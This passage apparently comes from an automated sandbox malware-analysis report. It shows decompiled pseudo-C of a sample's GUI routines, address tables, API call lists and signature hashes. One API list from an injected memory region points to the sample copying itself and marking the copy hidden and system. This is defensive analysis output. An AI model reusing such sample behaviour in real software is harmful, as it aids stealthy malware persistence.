                                                                                                                                                                                                                                                                                          					 *(_t74 - 0x190) = 0x30;
                                                                                                                                                                                                                                                                                          					E00106820(_t74 - 0x13c, 0, 0x90);
                                                                                                                                                                                                                                                                                          					_t76 = _t76 + 0x18;
                                                                                                                                                                                                                                                                                          					_t67 = _t74 - 0x140;
                                                                                                                                                                                                                                                                                          					 *(_t74 - 0x140) = 0x94;
                                                                                                                                                                                                                                                                                          					if(GetVersionExA(_t74 - 0x140) == 0) {
                                                                                                                                                                                                                                                                                          						L6:
                                                                                                                                                                                                                                                                                          						 *(_t74 - 0x190) = 0x2c;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t57 =  *((intOrPtr*)(_t74 - 0x13c));
                                                                                                                                                                                                                                                                                          						if(_t57 < 5 && (_t57 != 4 ||  *((intOrPtr*)(_t74 - 0x138)) < 0x5a)) {
                                                                                                                                                                                                                                                                                          							goto L6;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t74 - 0x168)) = 0x64;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t74 - 0x18c)) = 0x3f;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t74 - 0x16c)) = _t74 - 0x70;
                                                                                                                                                                                                                                                                                          					if(GetMenuItemInfoA(_t68, _t58, 1, _t74 - 0x190) == 0 || ( *(_t74 - 0x188) & 0x00000800) != 0) {
                                                                                                                                                                                                                                                                                          						goto L20;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t52 =  *((intOrPtr*)(_t74 - 0x170));
                                                                                                                                                                                                                                                                                          						if(_t52 == 0 ||  *_t52 != 0x1313) {
                                                                                                                                                                                                                                                                                          							goto L20;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t53 =  *(_t52 + 4);
                                                                                                                                                                                                                                                                                          							if(_t53 == 0) {
                                                                                                                                                                                                                                                                                          								goto L20;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_t65 =  *_t53;
                                                                                                                                                                                                                                                                                          								if(_t65 == 0) {
                                                                                                                                                                                                                                                                                          									goto L20;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									while(_t65 != 0x26) {
                                                                                                                                                                                                                                                                                          										_t53 = CharNextA(_t53);
                                                                                                                                                                                                                                                                                          										_t65 =  *_t53;
                                                                                                                                                                                                                                                                                          										if(_t65 != 0) {
                                                                                                                                                                                                                                                                                          											continue;
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											goto L20;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										goto L23;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									if( *_t53 == 0) {
                                                                                                                                                                                                                                                                                          										goto L20;
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										_t67 = _t53[1];
                                                                                                                                                                                                                                                                                          										 *((intOrPtr*)(_t74 - 0x160)) = CharLowerA( *(_t74 + 8) & 0x0000ffff);
                                                                                                                                                                                                                                                                                          										if(CharLowerA(_t53[1] & 0x0000ffff) !=  *((intOrPtr*)(_t74 - 0x160))) {
                                                                                                                                                                                                                                                                                          											goto L20;
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											if( *((char*)(_t74 - 0x141)) != 0) {
                                                                                                                                                                                                                                                                                          												 *(_t74 - 0x148) = 3;
                                                                                                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                                                                                                          												_t67 = _t58 & 0x0000ffff;
                                                                                                                                                                                                                                                                                          												 *(_t74 - 0x150) = _t58 & 0x0000ffff;
                                                                                                                                                                                                                                                                                          												 *((char*)(_t74 - 0x141)) = 1;
                                                                                                                                                                                                                                                                                          												goto L20;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					L23:
                                                                                                                                                                                                                                                                                          					if( *((char*)(_t74 - 0x141)) != 0) {
                                                                                                                                                                                                                                                                                          						_t70 =  *(_t74 - 0x148);
                                                                                                                                                                                                                                                                                          						if(_t70 == 2) {
                                                                                                                                                                                                                                                                                          							PostMessageA( *(_t72 + 4), 0x448, 0xffffffff, 0);
                                                                                                                                                                                                                                                                                          							E00101570(_t72, _t70);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t67 =  *(_t74 - 0x150) & 0x0000ffff;
                                                                                                                                                                                                                                                                                          						 *( *(_t74 - 0x158)) = 1;
                                                                                                                                                                                                                                                                                          						 *(_t74 - 0x14c) = (_t70 & 0x0000ffff) << 0x00000010 |  *(_t74 - 0x150) & 0x0000ffff;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_pop(_t69);
                                                                                                                                                                                                                                                                                          					_pop(_t73);
                                                                                                                                                                                                                                                                                          					_pop(_t59);
                                                                                                                                                                                                                                                                                          					return E001059E6( *(_t74 - 0x14c), _t59,  *(_t74 - 4) ^ _t74, _t67, _t69, _t73);
                                                                                                                                                                                                                                                                                          					L20:
                                                                                                                                                                                                                                                                                          					_t58 = _t58 + 1;
                                                                                                                                                                                                                                                                                          				} while (_t58 <  *((intOrPtr*)(_t74 - 0x154)));
                                                                                                                                                                                                                                                                                          				goto L23;
                                                                                                                                                                                                                                                                                          			}

















                                                                                                                                                                                                                                                                                          0x000fe95b
                                                                                                                                                                                                                                                                                          0x000fe960
                                                                                                                                                                                                                                                                                          0x000fe960
                                                                                                                                                                                                                                                                                          0x000fe971
                                                                                                                                                                                                                                                                                          0x000fe987
                                                                                                                                                                                                                                                                                          0x000fe991
                                                                                                                                                                                                                                                                                          0x000fe996
                                                                                                                                                                                                                                                                                          0x000fe999
                                                                                                                                                                                                                                                                                          0x000fe9a0
                                                                                                                                                                                                                                                                                          0x000fe9b2
                                                                                                                                                                                                                                                                                          0x000fe9cd
                                                                                                                                                                                                                                                                                          0x000fe9cd
                                                                                                                                                                                                                                                                                          0x000fe9b4
                                                                                                                                                                                                                                                                                          0x000fe9b4
                                                                                                                                                                                                                                                                                          0x000fe9bd
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fe9bd
                                                                                                                                                                                                                                                                                          0x000fe9e5
                                                                                                                                                                                                                                                                                          0x000fe9ef
                                                                                                                                                                                                                                                                                          0x000fe9f9
                                                                                                                                                                                                                                                                                          0x000fea07
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fea19
                                                                                                                                                                                                                                                                                          0x000fea19
                                                                                                                                                                                                                                                                                          0x000fea21
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fea2b
                                                                                                                                                                                                                                                                                          0x000fea2b
                                                                                                                                                                                                                                                                                          0x000fea30
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fea32
                                                                                                                                                                                                                                                                                          0x000fea32
                                                                                                                                                                                                                                                                                          0x000fea36
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fea38
                                                                                                                                                                                                                                                                                          0x000fea38
                                                                                                                                                                                                                                                                                          0x000fea3e
                                                                                                                                                                                                                                                                                          0x000fea44
                                                                                                                                                                                                                                                                                          0x000fea48
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fea4a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fea4a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fea48
                                                                                                                                                                                                                                                                                          0x000fea4f
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fea51
                                                                                                                                                                                                                                                                                          0x000fea51
                                                                                                                                                                                                                                                                                          0x000fea67
                                                                                                                                                                                                                                                                                          0x000fea79
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fea7b
                                                                                                                                                                                                                                                                                          0x000fea82
                                                                                                                                                                                                                                                                                          0x000feaa3
                                                                                                                                                                                                                                                                                          0x000fea84
                                                                                                                                                                                                                                                                                          0x000fea84
                                                                                                                                                                                                                                                                                          0x000fea87
                                                                                                                                                                                                                                                                                          0x000fea8d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fea8d
                                                                                                                                                                                                                                                                                          0x000fea82
                                                                                                                                                                                                                                                                                          0x000fea79
                                                                                                                                                                                                                                                                                          0x000fea4f
                                                                                                                                                                                                                                                                                          0x000fea36
                                                                                                                                                                                                                                                                                          0x000fea30
                                                                                                                                                                                                                                                                                          0x000fea21
                                                                                                                                                                                                                                                                                          0x000feaad
                                                                                                                                                                                                                                                                                          0x000feab4
                                                                                                                                                                                                                                                                                          0x000feaba
                                                                                                                                                                                                                                                                                          0x000feac3
                                                                                                                                                                                                                                                                                          0x000fead2
                                                                                                                                                                                                                                                                                          0x000feada
                                                                                                                                                                                                                                                                                          0x000feada
                                                                                                                                                                                                                                                                                          0x000feadf
                                                                                                                                                                                                                                                                                          0x000feaf4
                                                                                                                                                                                                                                                                                          0x000feafa
                                                                                                                                                                                                                                                                                          0x000feafa
                                                                                                                                                                                                                                                                                          0x000fec83
                                                                                                                                                                                                                                                                                          0x000fec84
                                                                                                                                                                                                                                                                                          0x000fec87
                                                                                                                                                                                                                                                                                          0x000fec90
                                                                                                                                                                                                                                                                                          0x000fea94
                                                                                                                                                                                                                                                                                          0x000fea94
                                                                                                                                                                                                                                                                                          0x000fea95
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 000FE971
                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 000FE991
                                                                                                                                                                                                                                                                                          • GetVersionExA.KERNEL32(?,?,?,?,?,?,?), ref: 000FE9AA
                                                                                                                                                                                                                                                                                          • GetMenuItemInfoA.USER32 ref: 000FE9FF
                                                                                                                                                                                                                                                                                          • CharNextA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000FEA3E
                                                                                                                                                                                                                                                                                          • CharLowerA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000FEA60
                                                                                                                                                                                                                                                                                          • CharLowerA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000FEA6D
                                                                                                                                                                                                                                                                                          • PostMessageA.USER32 ref: 000FEAD2
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000044E,?,?), ref: 000FEB31
                                                                                                                                                                                                                                                                                          • PostMessageA.USER32 ref: 000FEB45
                                                                                                                                                                                                                                                                                          • IsWindowEnabled.USER32(?), ref: 000FEB79
                                                                                                                                                                                                                                                                                          • GetClientRect.USER32 ref: 000FEBAE
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000041D,00000000,?), ref: 000FEBD6
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000417,00000000,?), ref: 000FEC0F
                                                                                                                                                                                                                                                                                          • PostMessageA.USER32 ref: 000FEC58
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000448,00000000,00000000), ref: 000FEC6F
                                                                                                                                                                                                                                                                                          • MessageBeep.USER32(00000000), ref: 000FEC74
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Message$Send$CharPost$Lower_memset$BeepClientEnabledInfoItemMenuNextRectVersionWindow
                                                                                                                                                                                                                                                                                          • String ID: ,$?$Z$d
                                                                                                                                                                                                                                                                                          • API String ID: 735944419-3748737801
                                                                                                                                                                                                                                                                                          • Opcode ID: 79cd9db98d34486ab79f9ccfb406fe30ef0989a5b0a51cca137912d57eda4763
                                                                                                                                                                                                                                                                                          • Instruction ID: 3dccd22f36aa1bcfcabe1b3889b62f38b3a5af27556886e2c42a354d458737b5
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 79cd9db98d34486ab79f9ccfb406fe30ef0989a5b0a51cca137912d57eda4763
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D531A030A0026C9BEB71CB10CC857FDB7B5BB05700F1440D9E249A76A1D7B5AE80DF62
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(00000000), ref: 0252290F
                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(00000000), ref: 02522921
                                                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(0400C230,?,00000104), ref: 02522962
                                                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 02522984
                                                                                                                                                                                                                                                                                          • lstrcmpi.KERNEL32(00000104,?), ref: 02522998
                                                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(00000104,?,00000000), ref: 025229B7
                                                                                                                                                                                                                                                                                          • SetFileAttributesA.KERNEL32(?,00000006), ref: 025229C6
                                                                                                                                                                                                                                                                                          • lstrcpy.KERNEL32(00000104,?), ref: 025229D7
                                                                                                                                                                                                                                                                                          • lstrcpy.KERNEL32(00000000,?), ref: 02522A10
                                                                                                                                                                                                                                                                                          • lstrcpy.KERNEL32(-00000208,00000000), ref: 02522A24
                                                                                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,040012D0,00000000,00000000,00000000), ref: 02522A3B
                                                                                                                                                                                                                                                                                            • Part of subcall function 0252AF87: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0252AF96
                                                                                                                                                                                                                                                                                            • Part of subcall function 0252AF87: HeapFree.KERNEL32(00000000), ref: 0252AF9D
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719355201.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2520000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: lstrcpy$FileHeaplstrlen$AttributesCopyCreateEnvironmentFreeProcessThreadVariablelstrcmpiwnsprintf
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 925599630-0
                                                                                                                                                                                                                                                                                          • Opcode ID: d911199f599f580df0074c1148925606424698d1feabc22edd8c6c2de8748874
                                                                                                                                                                                                                                                                                          • Instruction ID: 267287f9936cf7febdaf42e941f39457e7f9baaa34276460980a426a91ae900f
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d911199f599f580df0074c1148925606424698d1feabc22edd8c6c2de8748874
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7412175904218ABEB14DFA4D849BDA7BB5FF49704F008299FA09A62C0D778DBC4CF91
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                                                                                                                                          			E000F7CE0(struct HWND__* __ecx) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				char _v140;
                                                                                                                                                                                                                                                                                          				struct HWND__* _v144;
                                                                                                                                                                                                                                                                                          				char _v148;
                                                                                                                                                                                                                                                                                          				int _v152;
                                                                                                                                                                                                                                                                                          				void* _v156;
                                                                                                                                                                                                                                                                                          				char _v160;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				void* __ebp;
                                                                                                                                                                                                                                                                                          				signed int _t79;
                                                                                                                                                                                                                                                                                          				void* _t82;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t87;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t100;
                                                                                                                                                                                                                                                                                          				char _t109;
                                                                                                                                                                                                                                                                                          				signed short* _t110;
                                                                                                                                                                                                                                                                                          				signed short* _t111;
                                                                                                                                                                                                                                                                                          				char _t117;
                                                                                                                                                                                                                                                                                          				signed short _t129;
                                                                                                                                                                                                                                                                                          				signed short _t130;
                                                                                                                                                                                                                                                                                          				signed int* _t153;
                                                                                                                                                                                                                                                                                          				signed int _t160;
                                                                                                                                                                                                                                                                                          				signed short _t161;
                                                                                                                                                                                                                                                                                          				signed int* _t170;
                                                                                                                                                                                                                                                                                          				signed int _t173;
                                                                                                                                                                                                                                                                                          				signed short _t174;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t178;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t179;
                                                                                                                                                                                                                                                                                          				signed int _t192;
                                                                                                                                                                                                                                                                                          				signed int _t199;
                                                                                                                                                                                                                                                                                          				signed int _t202;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t79 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_v8 = _t79 ^ _t202;
                                                                                                                                                                                                                                                                                          				_t179 = __ecx;
                                                                                                                                                                                                                                                                                          				_t177 = __ecx + 0x54;
                                                                                                                                                                                                                                                                                          				_v144 = __ecx;
                                                                                                                                                                                                                                                                                          				_v156 =  *((intOrPtr*)(__ecx + 4));
                                                                                                                                                                                                                                                                                          				_v160 = __ecx + 0x54;
                                                                                                                                                                                                                                                                                          				_t82 = E000F6430();
                                                                                                                                                                                                                                                                                          				_t208 =  *((intOrPtr*)(_t82 + 0x30));
                                                                                                                                                                                                                                                                                          				if( *((intOrPtr*)(_t82 + 0x30)) == 0) {
                                                                                                                                                                                                                                                                                          					 *(E000F6430() + 0x30) = "ToolbarWindow32";
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t87 = E00104510(_t177, E00103FF0(E000F6430(), 0x170c04, _t177 + 0x40) & 0x0000ffff, _t179, _v156, 0x15ad10, 0, 0x5600184c, 0, 0);
                                                                                                                                                                                                                                                                                          				E000FBB40(GetMenu( *(_t179 + 4)), _v156, _t177);
                                                                                                                                                                                                                                                                                          				E000FDA60(_t177, 0x80);
                                                                                                                                                                                                                                                                                          				SetMenu( *(_t179 + 4), 0);
                                                                                                                                                                                                                                                                                          				_v156 = E000FA4A0(0xe800,  *(_t179 + 4), 0x80);
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t179 + 0x24)) = E000FD050( *(_t179 + 4));
                                                                                                                                                                                                                                                                                          				E000FD0D0(_t87, _t95, 0);
                                                                                                                                                                                                                                                                                          				_t178 = _v144;
                                                                                                                                                                                                                                                                                          				E000FD0D0(_v156,  *(_t178 + 0x24), 1);
                                                                                                                                                                                                                                                                                          				_v140 = 0;
                                                                                                                                                                                                                                                                                          				LoadStringA( *0x170c0c, 0xe001,  &_v140, 0x80);
                                                                                                                                                                                                                                                                                          				_t100 =  *(_t178 + 4);
                                                                                                                                                                                                                                                                                          				__imp__#6(0x56000100,  &_v140, _t100, 0xe801);
                                                                                                                                                                                                                                                                                          				 *(_t178 + 0x28) = _t100;
                                                                                                                                                                                                                                                                                          				E001042F0(_t100, _t178 + 0x224);
                                                                                                                                                                                                                                                                                          				_v152 = 0;
                                                                                                                                                                                                                                                                                          				_v148 = 0xefdb;
                                                                                                                                                                                                                                                                                          				_v144 = 0xefdc;
                                                                                                                                                                                                                                                                                          				E000FAA10(_t178 + 0x224,  &_v152, _t208);
                                                                                                                                                                                                                                                                                          				_v144 =  *(_t178 + 4);
                                                                                                                                                                                                                                                                                          				if( *(E000F6BB0() + 0x30) == 0) {
                                                                                                                                                                                                                                                                                          					 *(E000F6BB0() + 0x30) = "RichEdit20A";
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t178 + 0x2c)) = E00103ED0(_t178 + 0x250, E00103FF0(E000F6BB0(), 0x170c04, _t178 + 0x270) & 0x0000ffff, _v144, 0x15ad10, 0, 0x513081c4, 0x200, 0);
                                                                                                                                                                                                                                                                                          				_t109 = _v156;
                                                                                                                                                                                                                                                                                          				if(_t109 != 0) {
                                                                                                                                                                                                                                                                                          					_v148 = _t109;
                                                                                                                                                                                                                                                                                          					_v144 = 8;
                                                                                                                                                                                                                                                                                          					E000FA990( &_v148, _t178 + 0x3c);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t153 =  *(_t178 + 0x4c);
                                                                                                                                                                                                                                                                                          				_t110 =  *(_t178 + 0x48);
                                                                                                                                                                                                                                                                                          				if(_t153 == 0) {
                                                                                                                                                                                                                                                                                          					L15:
                                                                                                                                                                                                                                                                                          					_t170 =  *(_t178 + 0x4c);
                                                                                                                                                                                                                                                                                          					_t111 =  *(_t178 + 0x48);
                                                                                                                                                                                                                                                                                          					if(_t170 == 0) {
                                                                                                                                                                                                                                                                                          						L25:
                                                                                                                                                                                                                                                                                          						_t141 = SendMessageA;
                                                                                                                                                                                                                                                                                          						SendMessageA( *(_t178 + 4), 0x7e8, 0, 0);
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t178 + 0x528)) = E000FA4A0(0xe801,  *(_t178 + 4), 0x6c);
                                                                                                                                                                                                                                                                                          						E000FD0D0(_t114,  *(_t178 + 0x24), 1);
                                                                                                                                                                                                                                                                                          						_t172 =  *(_t178 + 0x24);
                                                                                                                                                                                                                                                                                          						SendMessageA( *(_t178 + 0x24), 0x423, 2, 0);
                                                                                                                                                                                                                                                                                          						_t117 =  *((intOrPtr*)(_t178 + 0x528));
                                                                                                                                                                                                                                                                                          						if(_t117 != 0) {
                                                                                                                                                                                                                                                                                          							_v148 = _t117;
                                                                                                                                                                                                                                                                                          							_t141 =  &_v148;
                                                                                                                                                                                                                                                                                          							_v144 = 8;
                                                                                                                                                                                                                                                                                          							E000FA990( &_v148, _t178 + 0x3c);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						E000FB100(GetSubMenu(GetSubMenu( *(E000FBB30( &_v160, _v160)), 0), 0xb), _t178 + 0x108);
                                                                                                                                                                                                                                                                                          						E000FB460(_t178 + 0x108);
                                                                                                                                                                                                                                                                                          						return E001059E6(0, _t141, _v8 ^ _t202, _t172, _t178, _t178 + 0x108);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t160 =  *_t111 & 0x0000ffff;
                                                                                                                                                                                                                                                                                          					if(_t160 == 0xffff) {
                                                                                                                                                                                                                                                                                          						goto L25;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					while(0xe801 != _t160) {
                                                                                                                                                                                                                                                                                          						_t160 = _t111[2] & 0x0000ffff;
                                                                                                                                                                                                                                                                                          						_t111 =  &(_t111[2]);
                                                                                                                                                                                                                                                                                          						_t170 =  &(_t170[2]);
                                                                                                                                                                                                                                                                                          						if(_t160 != 0xffff) {
                                                                                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						goto L25;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t161 =  *_t170 & 0x0000ffff;
                                                                                                                                                                                                                                                                                          					__eflags = _t161 & 0x00000200;
                                                                                                                                                                                                                                                                                          					if((_t161 & 0x00000200) == 0) {
                                                                                                                                                                                                                                                                                          						_t192 = (_t111[1] | _t161) & 0x0000fbff | 0x00000200;
                                                                                                                                                                                                                                                                                          						__eflags = _t192;
                                                                                                                                                                                                                                                                                          						 *_t170 = _t192;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t129 = _t111[1] & 0x0000ffff;
                                                                                                                                                                                                                                                                                          					__eflags =  *_t170 & _t129;
                                                                                                                                                                                                                                                                                          					if(( *_t170 & _t129) != 0) {
                                                                                                                                                                                                                                                                                          						_t63 = _t178 + 0x50;
                                                                                                                                                                                                                                                                                          						 *_t63 =  *(_t178 + 0x50) | _t129;
                                                                                                                                                                                                                                                                                          						__eflags =  *_t63;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L25;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t173 =  *_t110 & 0x0000ffff;
                                                                                                                                                                                                                                                                                          					if(_t173 == 0xffff) {
                                                                                                                                                                                                                                                                                          						goto L15;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					while(0xe800 != _t173) {
                                                                                                                                                                                                                                                                                          						_t173 = _t110[2] & 0x0000ffff;
                                                                                                                                                                                                                                                                                          						_t110 =  &(_t110[2]);
                                                                                                                                                                                                                                                                                          						_t153 =  &(_t153[2]);
                                                                                                                                                                                                                                                                                          						if(_t173 != 0xffff) {
                                                                                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						goto L15;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t174 =  *_t153 & 0x0000ffff;
                                                                                                                                                                                                                                                                                          					__eflags = _t174 & 0x00000200;
                                                                                                                                                                                                                                                                                          					if((_t174 & 0x00000200) == 0) {
                                                                                                                                                                                                                                                                                          						_t199 = (_t110[1] | _t174) & 0x0000fbff | 0x00000200;
                                                                                                                                                                                                                                                                                          						__eflags = _t199;
                                                                                                                                                                                                                                                                                          						 *_t153 = _t199;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t130 = _t110[1] & 0x0000ffff;
                                                                                                                                                                                                                                                                                          					__eflags =  *_t153 & _t130;
                                                                                                                                                                                                                                                                                          					if(( *_t153 & _t130) != 0) {
                                                                                                                                                                                                                                                                                          						_t52 = _t178 + 0x50;
                                                                                                                                                                                                                                                                                          						 *_t52 =  *(_t178 + 0x50) | _t130;
                                                                                                                                                                                                                                                                                          						__eflags =  *_t52;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L15;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}



































                                                                                                                                                                                                                                                                                          0x000f7ce9
                                                                                                                                                                                                                                                                                          0x000f7cf0
                                                                                                                                                                                                                                                                                          0x000f7cf5
                                                                                                                                                                                                                                                                                          0x000f7cfb
                                                                                                                                                                                                                                                                                          0x000f7cfe
                                                                                                                                                                                                                                                                                          0x000f7d04
                                                                                                                                                                                                                                                                                          0x000f7d0a
                                                                                                                                                                                                                                                                                          0x000f7d10
                                                                                                                                                                                                                                                                                          0x000f7d15
                                                                                                                                                                                                                                                                                          0x000f7d19
                                                                                                                                                                                                                                                                                          0x000f7d20
                                                                                                                                                                                                                                                                                          0x000f7d20
                                                                                                                                                                                                                                                                                          0x000f7d5a
                                                                                                                                                                                                                                                                                          0x000f7d6d
                                                                                                                                                                                                                                                                                          0x000f7d78
                                                                                                                                                                                                                                                                                          0x000f7d83
                                                                                                                                                                                                                                                                                          0x000f7d9f
                                                                                                                                                                                                                                                                                          0x000f7daa
                                                                                                                                                                                                                                                                                          0x000f7db2
                                                                                                                                                                                                                                                                                          0x000f7db7
                                                                                                                                                                                                                                                                                          0x000f7dc9
                                                                                                                                                                                                                                                                                          0x000f7de9
                                                                                                                                                                                                                                                                                          0x000f7df0
                                                                                                                                                                                                                                                                                          0x000f7df6
                                                                                                                                                                                                                                                                                          0x000f7e0b
                                                                                                                                                                                                                                                                                          0x000f7e19
                                                                                                                                                                                                                                                                                          0x000f7e1c
                                                                                                                                                                                                                                                                                          0x000f7e29
                                                                                                                                                                                                                                                                                          0x000f7e33
                                                                                                                                                                                                                                                                                          0x000f7e3d
                                                                                                                                                                                                                                                                                          0x000f7e47
